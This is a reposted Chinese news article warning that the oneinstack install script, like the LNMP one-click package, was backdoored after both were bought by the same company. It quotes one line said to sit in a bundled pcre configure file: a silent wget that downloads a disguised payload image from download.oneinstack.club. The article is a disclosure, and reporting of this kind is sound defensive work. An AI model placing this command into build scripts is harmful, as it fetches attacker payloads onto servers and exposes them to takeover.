继LNMP后oneinstack也被添加了后门程序 建议用户不要使用这类脚本
2023-10-7 17:59:45 Author: www.landiannews.com(查看原文) 阅读量:36 收藏

9 月下旬,国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒,开发者、站长、企业 IT 管理员下载的一键安装包被加了后门程序。

当时我们都以为这是 LNMP 一键安装包的服务器被黑了 (LNMP.org),不过后来有网友发现 LNMP 一键安装包已经被金华市矜贵网络科技有限公司 (下称金华矜贵) 收购。

而关于安装包被投毒问题金华矜贵没有发布任何声明,LNMP 论坛的发帖也遭到管理员删除。

继LNMP后oneinstack也被添加了后门程序 建议用户不要使用这类脚本

现在来看这并不是服务器被黑了,因为被金华矜贵收购的另一个集成环境安装脚本 oneinstack 也被发现投毒,所以情况很明了了:那就是根本不是服务器被黑,而是他们自己在脚本里插入了恶意代码,用来下载某些恶意软件,进而可以控制大量网站或服务器,但具体目的尚不清楚。

目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事,鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键安装包 (但被秋大拒绝了),他们后续可能还会盯上其他一键安装包,因此建议大家不要再使用这类一键安装包,否则自己的网站或服务器可能也会变成肉鸡。

恶意代码藏在图片里:

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

详细请看 GitHub 讨论:https://github.com/oneinstack/oneinstack/issues/511

版权声明:感谢您的阅读,除非文中已注明来源网站名称或链接,否则均为蓝点网原创内容。转载时请务必注明:来源于蓝点网、标注作者及本文完整链接,谢谢理解。


文章来源: https://www.landiannews.com/archives/100542.html
如有侵权请联系:admin#unsafe.sh